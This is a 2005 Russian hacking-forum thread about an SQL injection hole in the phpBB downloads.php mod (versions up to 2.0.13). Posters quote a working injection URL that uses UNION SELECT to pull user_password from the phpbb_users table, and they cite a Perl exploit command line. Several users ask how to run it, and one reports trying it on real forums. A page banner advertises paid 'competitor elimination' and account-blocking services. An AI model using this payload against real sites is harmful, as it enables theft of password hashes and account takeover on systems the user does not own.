Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

05.04.2005, 22:47

~~SladerNon~~

Banned

Регистрация: 06.03.2005

Сообщений: 1,645

С нами: 11147366

Репутация: 901

Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

Бедный, всеми измученный форум, и опять дыра =)

Читаем тут:

http://www.securitylab.ru/53767.html

𝕏 Twitter Reddit Telegram Копировать ссылку

05.04.2005, 22:59

(-=util=-)

Постоянный

Регистрация: 02.12.2004

Сообщений: 352

С нами: 11282726

Репутация: 67

Угагагаааа))))) Ваще кранты =0)) Они же разорятся!

05.04.2005, 23:01

(-=util=-)

Постоянный

Регистрация: 02.12.2004

Сообщений: 352

С нами: 11282726

Репутация: 67

Цитата:

downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*

а разве модуль downloads встроен во все форумы?

Пример

C:\>phpbb.pl www.site.com /phpBB2/ 2

В Выполнить это вообще писать? или как. если адрес форума www.site.com/phpBB2/index.php
И как понимать вообще знак ">"

Последний раз редактировалось (-=util=-); 05.04.2005 в 23:18..

05.04.2005, 23:35

Mefisto

Участник форума

Регистрация: 10.10.2004

Сообщений: 101

С нами: 11359575

Репутация: 4

а как этим пользоваться?)))

06.04.2005, 00:20

Sn_key

Участник форума

Регистрация: 07.03.2005

Сообщений: 160

С нами: 11145866

Репутация: 30

Блин!!! Несколько форумов перебрал все закрыты или
ужэ взломаны!!!Обьясните мож я чо не то делаю???

Цитата:

downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=2/*

Вот сплойт вставляю я его в адрес но не х не получается:
ДОКУМЕНТ НЕ НАЙДЕН!!!!!!!!!!

06.04.2005, 06:05

(-=util=-)

Постоянный

Регистрация: 02.12.2004

Сообщений: 352

С нами: 11282726

Репутация: 67

lol. Это однас тсрочка только из сплойта =) Внимательнее читай просто

06.04.2005, 09:27

madnet

Умиротворенн

Регистрация: 09.12.2004

Сообщений: 996

С нами: 11272646

Репутация: 1384

Эта дыра только в МОДЕ downloads.php, а он почти нигде не используется.

__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА

06.04.2005, 09:37

hacsoft

Познающий

Регистрация: 14.03.2005

Сообщений: 43

С нами: 11135481

Репутация: 2

А где можно закачать этот мод? Дайте ссылочку.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6	vega2k	Уязвимости CMS / форумов	12	11.01.2009 15:57
Новая XSS на форуме phpBB 2.0.19	NeMiNeM	Уязвимости CMS / форумов	6	26.10.2006 21:30
Уязвимость в phpBB 2.0.17	PEPSICOLA	Уязвимости CMS / форумов	13	28.09.2005 20:26
Как загрузить в папку форума, файл *.php, если я админ на форуме PhpBB 2.0.13?	dyx	Уязвимости CMS / форумов	1	05.04.2005 11:29
Как узнать пароль на форуме phpBB <=2.0.10 ?	Evgeny	Уязвимости CMS / форумов	6	26.11.2004 22:10

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход